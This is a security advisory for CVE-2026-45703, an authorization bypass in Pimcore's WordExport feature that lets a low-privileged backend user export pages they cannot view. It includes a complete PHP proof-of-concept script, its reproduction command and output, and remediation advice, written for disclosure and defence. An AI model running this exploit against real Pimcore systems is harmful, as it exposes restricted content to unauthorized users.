CVE-2026-45703

CVSS v3.1

6.4

Medium

Vector

AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:L

Summary

The WordExport export flow only checks whether the current backend user has the feature permission word export. It does not verify access rights on the target element itself. As a result, a low-privileged backend user can export document content even when the user does not have view permission on that document.

In the local Docker reproduction, a low-privileged user successfully exported sensitive content from a page the user was not allowed to view:

POC-WORDEXPORT-TITLE
POC-WORDEXPORT-DESC

Root Cause

The controller only performs a feature-level permission check before starting the export flow:

[TranslationController.php](pimcore-12.3.3/bundles/WordExportBundle/src/Controller/TranslationController.php#L41)
TranslationController.php

It then directly resolves the target element from attacker-controlled type/id input:

[TranslationController.php](pimcore-12.3.3/bundles/WordExportBundle/src/Controller/TranslationController.php#L56)
[TranslationController.php](pimcore-12.3.3/bundles/WordExportBundle/src/Controller/TranslationController.php#L58)

For document-like elements such as Page and Snippet, it renders content in an admin context:

[TranslationController.php](pimcore-12.3.3/bundles/WordExportBundle/src/Controller/TranslationController.php#L72)
TranslationController.php
TranslationController.php

No object-level authorization check such as isAllowed('view') is enforced on the target element.

Affected Scope

Based on the source code, the following element types may be affected:

page
snippet
email
object

For page-like documents, the pimcore admin = true rendering context may expose additional backend-visible content.

Preconditions

The attacker is an authenticated backend user
The attacker has the word export permission
The attacker does not have view permission on the target document

Reproduction Environment

Reproduction root: pimcore-12.3.3-repro
Standalone PoC script: [[poc wordexport.php](https://github.com/pimcore/pimcore/security/advisories/pimcore-12.3.3-repro/tools/poc wordexport.php)](pimcore-12.3.3-repro/tools/poc wordexport.php)

<?php
declare(strict types=1);

use PimcoreBundleWordExportBundleControllerTranslationController as WordExportController;
use PimcoreControllerUserAwareController;
use PimcoreModelDocumentPage;
use PimcoreModelUser;
use PimcoreSecurityUserTokenStorageUserResolver;
use PimcoreSecurityUserUser as SecurityUser;
use PimcoreSerializerSerializer as PimcoreSerializer;
use PimcoreToolAuthentication;
use SymfonyComponentDependencyInjectionContainerInterface;
use SymfonyComponentFilesystemFilesystem;
use SymfonyComponentHttpFoundationRequest;
use SymfonyComponentHttpFoundationRequestStack;
use SymfonyComponentSecurityCoreAuthenticationTokenUsernamePasswordToken;
use SymfonyComponentSecurityCoreAuthenticationTokenStorageTokenStorage;

require dirname( DIR ) . '/vendor/autoload.php';

define('PIMCORE PROJECT ROOT', dirname( DIR ));

try {
  PimcoreBootstrap::bootstrap();

  $kernel = new AppKernel('dev', true);
  Pimcore::setKernel($kernel);
  $kernel->boot();

  $container = $kernel->getContainer();

  /** @var RequestStack $requestStack */
  $requestStack = getService($container, [
    RequestStack::class,
    'request stack',
  ]);

  $admin = User::getByName('admin');
  if (!$admin instanceof User) {
    fail('admin user is missing');
  }

  $auditor = User::getByName('auditor wordexport');
  if (!$auditor instanceof User) {
    $auditor = new User();
    $auditor->setParentId(0);
    $auditor->setName('auditor wordexport');
  }

  $auditor->setAdmin(false);
  $auditor->setActive(true);
  $auditor->setPassword(Authentication::getPasswordHash('auditor wordexport', 'auditor-pass'));
  $auditor->setPermissions(['word export']);
  $auditor->setRoles([]);
  $auditor->setWorkspacesDocument([]);
  $auditor->setWorkspacesAsset([]);
  $auditor->setWorkspacesObject([]);
  $auditor->save();

  $page = Page::getByPath('/poc-wordexport-secret-page');
  if (!$page instanceof Page) {
    $page = new Page();
    $page->setParentId(1);
    $page->setKey('poc-wordexport-secret-page');
  }

  $page->setPublished(true);
  $page->setController('AppControllerDefaultController::defaultAction');
  $page->setTemplate('default/default.html.twig');
  $page->setTitle('POC-WORDEXPORT-TITLE');
  $page->setDescription('POC-WORDEXPORT-DESC');
  $page->setProperty('language', 'text', 'en', false, true);
  $page->setUserOwner($admin->getId());
  $page->setUserModification($admin->getId());
  $page->save();

  $canViewPage = $page->getDao()->isAllowed('view', $auditor);

  $tokenResolver = buildTokenResolver($auditor);
  $controller = wireController(new WordExportController(), $container, $tokenResolver);

  $exportId = 'wordexportpoc1';
  $exportRequest = new Request([], [
    'id' => $exportId,
    'data' => json encode([
      ['type' => 'document', 'id' => $page->getId()],
    ], JSON THROW ON ERROR),
    'source' => 'en',
  ]);

  $requestStack->push($exportRequest);
  $controller->wordExportAction($exportRequest, new Filesystem());
  $requestStack->pop();

  $downloadRequest = new Request(['id' => $exportId]);
  $requestStack->push($downloadRequest);
  $downloadResponse = $controller->wordExportDownloadAction($downloadRequest);
  $requestStack->pop();

  $wordContent = (string) $downloadResponse->getContent();

  echo json encode([
    'vulnerability' => 'wordexport authorization bypass',
    'user' => [
      'id' => $auditor->getId(),
      'name' => $auditor->getName(),
      'permissions' => $auditor->getPermissions(),
    ],
    'target page' => [
      'id' => $page->getId(),
      'path' => $page->getFullPath(),
      'title' => $page->getTitle(),
      'description' => $page->getDescription(),
      'user can view page' => $canViewPage,
    ],
    'result' => [
      'download contains title' => str contains($wordContent, 'POC-WORDEXPORT-TITLE'),
      'download contains description' => str contains($wordContent, 'POC-WORDEXPORT-DESC'),
    ],
  ], JSON PRETTY PRINT | JSON UNESCAPED SLASHES), PHP EOL;
} catch (Throwable $e) {
  fail(sprintf(
    '%s: %s in %s:%d%s',
    $e::class,
    $e->getMessage(),
    $e->getFile(),
    $e->getLine(),
    $e->getTraceAsString() ? PHP EOL . $e->getTraceAsString() : ''
  ));
}

function wireController(
  UserAwareController $controller,
  ContainerInterface $container,
  TokenStorageUserResolver $tokenResolver
): UserAwareController
{
  $controller->setContainer($container);
  $controller->setTokenResolver($tokenResolver);

  if (method exists($controller, 'setPimcoreSerializer')) {
    /** @var PimcoreSerializer $serializer */
    $serializer = getService($container, [
      PimcoreSerializer::class,
      'PimcoreSerializerSerializer',
    ]);
    $controller->setPimcoreSerializer($serializer);
  }

  return $controller;
}

function buildTokenResolver(User $user): TokenStorageUserResolver
{
  $tokenStorage = new TokenStorage();
  $proxyUser = new SecurityUser($user);
  $token = new UsernamePasswordToken($proxyUser, 'pimcore admin', $proxyUser->getRoles());
  $tokenStorage->setToken($token);

  return new TokenStorageUserResolver($tokenStorage);
}

function getService(ContainerInterface $container, array $ids): mixed
{
  foreach ($ids as $id) {
    try {
      if ($container->has($id)) {
        return $container->get($id);
      }
    } catch (Throwable) {
    }
  }

  fail('Unable to resolve service: ' . implode(', ', $ids));
}

function fail(string $message): never
{
  fwrite(STDERR, $message . PHP EOL);
  exit(1);
}

Reproduction Steps

Create a low-privileged user named auditor wordexport with only the word export permission and no document workspace permissions.
Create a test page at /poc-wordexport-secret-page containing sensitive values:

title = POC-WORDEXPORT-TITLE
description = POC-WORDEXPORT-DESC

Verify that the user does not have view permission on that page.
Execute wordExportAction() and wordExportDownloadAction() as that user.
Check whether the exported HTML contains the sensitive values.

Reproduction command:

cd pimcore-12.3.3-repro
docker compose exec -T php php tools/poc wordexport.php

Reproduction Result

Relevant PoC output:

{
 "vulnerability": "wordexport authorization bypass",
 "user": {
  "name": "auditor wordexport",
  "permissions": [
   "word export"
  ]
 },
 "target page": {
  "path": "/poc-wordexport-secret-page",
  "title": "POC-WORDEXPORT-TITLE",
  "description": "POC-WORDEXPORT-DESC",
  "user can view page": false
 },
 "result": {
  "download contains title": true,
  "download contains description": true
 }
}

This shows that:

The user cannot view the target page
The exported file still contains the page's sensitive content

This confirms that the issue is practically exploitable.

Security Impact

Unauthorized disclosure of structured page fields
Unauthorized export of restricted backend content
Potential exposure of unpublished or otherwise restricted content
Lateral data access by low-privileged backend accounts

Remediation

Perform object-level authorization immediately after resolving the element from type/id.
Require at least view permission on the target element.
Apply consistent authorization checks across page, snippet, email, and object.
Bind export creation and export download to the requesting user or an equivalent authorization context.
Add regression tests to ensure that users with word export but without element view permission cannot export content.

Fix

Incorrect Authorization

Found an issue in the description? Have something to add? Feel free to write us 👾

dbugs@ptsecurity.com

Weakness Enumeration

CWE-863

Related Identifiers

CVE-2026-45703

GHSA-332X-R494-54FQ

Affected Products

Pimcore/Pimcore

CVE-2026-45703

Summary

Root Cause

Affected Scope

Preconditions

Reproduction Environment

Reproduction Steps

Reproduction Result

Security Impact

Remediation

Weakness Enumeration

Related Identifiers

Affected Products

References · 6